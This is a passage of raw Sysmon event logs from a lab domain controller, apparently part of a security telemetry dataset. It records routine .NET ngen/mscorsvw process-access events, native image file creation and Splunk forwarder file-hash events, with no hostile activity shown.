ramework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000021053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.990{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0704-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.990{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0704-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.928{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4859EA36B06AA0465117F73C595C6834,SHA256=D2F1E826763110198C2F863FAD39215BF5D4110BEE4694B76AE2827C7E0C9363,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.896{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0604-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.865{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0604-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.865{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0604-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:47.850{4DB9351A-A1EF-60D3-0504-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f64-0\Microsoft.Windows.ServerManager.Ipam.Plugin.dll2021-06-23 21:04:47.850 10341000x800000000000000021046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0504-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.771{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0504-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.771{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0504-00000000CF01}3940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.709{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3D6A3AD2A8DA25A840F7D4D490348E1,SHA256=30735BEE47EAF72C8FFE903ADA5C0D3494C654D97385345D19F4F0117290E404,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.663{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0404-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.631{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0404-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.631{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0404-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:47.600{4DB9351A-A1EF-60D3-0304-00000000CF01}7012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b64-0\Microsoft.Windows.ServerManager.HyperV.Plugin.dll2021-06-23 21:04:47.600 10341000x800000000000000021038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.303{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0304-00000000CF01}7012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.271{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0304-00000000CF01}7012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.271{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0304-00000000CF01}7012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0204-00000000CF01}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.131{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EF-60D3-0204-00000000CF01}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:47.131{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EF-60D3-0204-00000000CF01}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:47.084{4DB9351A-A1EE-60D3-0104-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ba4-0\Microsoft.Windows.ServerManager.FaxServer.Plugin.dll2021-06-23 21:04:47.084 23542300x800000000000000021064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.990{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36C88C10C92CFFF2DDC4A2E04FA8DC18,SHA256=E1D70EDE48BCC7339DAEE598CBF2396C76322C344E9B0E3EEE029E6FDECFF77A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.818{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E4F32B58970903D3F6ED1F727047553,SHA256=E2089BE830293952CAF3C65E5E00E22858583D5F02B1360EECF78D84914B5461,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.725{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F0-60D3-0904-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.693{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F0-60D3-0904-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.693{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F0-60D3-0904-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 